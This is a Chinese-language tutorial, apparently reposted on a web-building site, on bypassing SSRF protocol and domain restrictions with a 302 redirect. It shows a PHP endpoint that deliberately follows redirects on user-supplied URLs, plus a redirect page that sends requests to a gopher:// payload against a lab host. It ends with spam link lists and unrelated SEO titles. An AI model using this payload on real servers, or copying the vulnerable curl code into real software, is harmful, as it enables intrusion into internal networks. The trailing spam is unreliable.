当前位置: 首页 > wzjs >正文

营销型网站手机端enfold wordpress

营销型网站手机端,enfold wordpress,怎样建网站卖东西,如何优化网站排名ssrf漏洞在厂商的处理下可能进行一些特殊处理导致我们无法直接利用漏洞 有以下四种: 1.ip地址限制绕过 2.域名限制绕过 3.30x跳转绕过域名限制 4.DNS rebinding绕过内网ip限制 本章我们讲30x跳转绕过域名限制 30x跳转绕过域名限制 之前我们使用ssrf漏洞时可以…

ssrf漏洞在厂商的处理下可能进行一些特殊处理导致我们无法直接利用漏洞

有以下四种:

1.ip地址限制绕过

2.域名限制绕过

3.30x跳转绕过域名限制

4.DNS rebinding绕过内网ip限制

本章我们讲30x跳转绕过域名限制

30x跳转绕过域名限制

       之前我们使用ssrf漏洞时可以利用各种协议进行访问,如file,gopher等等,如果厂商限制我们

只能使用http协议我们怎么进行绕过

我们可以利用30x跳转绕过域名限制

原理如下图所示:

用户请求                ->                        服务器                     ->                            目标
                                                          服务器                    <-              返回重定向到 NewTarget
                                                          服务器                     ->                        NewTarget

       SSRF 的本质就是服务器访问了目标,如果目标返回一个重定向,此时服务器如果支持跟随重

定向则再次访问新的目标,服务器在创建请求时可以设置是否跟随重定向,下面通过 php 代码演

示。

<?php
$ch=curl_init(); // 初始化一个 cURL 对象
$url=$_GET['url']; // 从 GET 请求中获取 URL 参数
curl_setopt($ch,CURLOPT_URL,$url); // 设置要访问的 URL
curl_setopt($ch,CURLOPT_HEADER,0); // 设置是否包含头部信息
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); // 设置是否返回输出,不直接输出到页面
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); // 设置是否跟随跳转
$res=curl_exec($ch); // 执行 cURL 请求并获取返回结果
var_dump(curl_error($ch) ); // 打印 cURL 错误信息(如果有)
curl_close($ch); // 关闭 cURL 资源
echo $res; // 输出返回的结果
?>

以上 php 代码接收 URL 参数通过 curl 方法创建新的请求,并设置支持重定向。

那么我们就设置完成靶场跟随重定向。

下面我们创建一个302跳转平台:

kali 创建 302 跳转页面,通过 Location 返回 302 跳转,跳转使用 gopher 协议。

<?php
header("Location:gopher://192.168.112.12:80/_GET%20/pikachu-master/vul/ssrf/ssrf_info/info1.php%20HTTP/1.1%0D%0AHost%3A%20192.168.112.12%0D%0A");
?>

自己注意一下拼写不要直接复制粘贴。

我们去靶场尝试:

我们打开靶场:

url:http://192.168.112.12/ssrf.php

我们构造url:http://192.168.112.12/ssrf.php?url=http://192.168.112.12/302.php

         可以看到 ssrf.php 访问 302.php 成功根据 Location 加载 gopher 协议访问 info1.php,这使

得ssrf.php 如果对 url 参数采取白名单限制仅 HTTP 协议是无效的,到此我们就完成了绕过。

       302 跳转也可以通过短连接平台实现跳转,这里不对短连接平台进行测试,个别短连接平台会

对目标进行检测,选择哪个短连接平台亦或者自建平台自行测试。

注意:能否使用30x跳转技巧,取决于服务器功能点是否启用跟随跳转


文章转载自:

http://fxZm11AA.trffL.cn
http://6VjdDI26.trffL.cn
http://WT44yvQa.trffL.cn
http://nUL0BjQW.trffL.cn
http://tNScWTrL.trffL.cn
http://iwiV7B7x.trffL.cn
http://gXB33ZZU.trffL.cn
http://mZ2fP84r.trffL.cn
http://AQqgG7lI.trffL.cn
http://ENsb7mbh.trffL.cn
http://ph1UW6qp.trffL.cn
http://TauFn3QY.trffL.cn
http://MbRrN0mI.trffL.cn
http://2dFkz5mv.trffL.cn
http://lUzyot6c.trffL.cn
http://2g30Hi8Q.trffL.cn
http://sAmJjb2I.trffL.cn
http://jFUWAfeD.trffL.cn
http://X62QZu0b.trffL.cn
http://BLKPF2lM.trffL.cn
http://eXyZJOzz.trffL.cn
http://oMHIA2Tf.trffL.cn
http://66AY7enw.trffL.cn
http://SMWPmqVm.trffL.cn
http://4wSQ82mJ.trffL.cn
http://pMhvdtTQ.trffL.cn
http://elRYEtia.trffL.cn
http://9FyRbG5K.trffL.cn
http://CZKQz545.trffL.cn
http://nYpVV95X.trffL.cn
http://www.dtcms.com/wzjs/718308.html

相关文章:

  • 建设微信网站需要服务器做个商城小程序需要多少钱
  • 电商网站设计网站 建设 汇报
  • 说明电子商务网站的建设流程vr功能网站建设
  • 建设银行安徽 招聘网站网页设计代码和效果图
  • 做APP好还是建设网站好建设部一建查询网站
  • 网站开发和大数据开发区别网站建设费能不能认定为广告费
  • 做彩票网站模板注册安全工程师报名时间
  • 光谷软件园 网站建设常见的网站类型有
  • wordpress 商城站下载地址wordpress dux主题设置
  • 佛山外贸网站设计赣州做网站找谁
  • 移动网站设计wordpress带数据
  • asp.netmvc 做网站秦皇岛市教育局官网
  • 给女朋友做网站公司网站开发费用兴田德润在哪儿
  • 建设网站2013道路定额wordpress推送服务器
  • 企业网站备案材料外贸手机商城网站建设 深圳
  • 邢台做移动网站哪儿好考试源码网站wordpress
  • 龙岩网站建设套餐服务360优化大师安卓下载
  • 莆田市秀屿区建设局网站怎么做网站不会被屏蔽
  • 仙桃住房和城乡建设部网站上海网站建设加q.479185700
  • 如何修改网站备案wordpress清新Minty主题v4
  • 美容院怎么建立自己的网站售后服务网站建设
  • 北京网站优化公司如何app开发的基本步骤
  • 简单网站制作实验报告二级建造师报名官网
  • 个人做淘宝客网站不能备案吗上海的建设网站
  • 文学类网站怎么做天津去山西高铁做哪个网站
  • 中铝长城建设有限公司网站网站开发语言为
  • 58同城企业网站怎么做的杭州优化建筑设计
  • 中山建网站价格中国和城乡建设部网站首页
  • 网站建设开发合同书(终极版)品牌海外推广
  • 安阳网站建设服务怎么做网站百度贴吧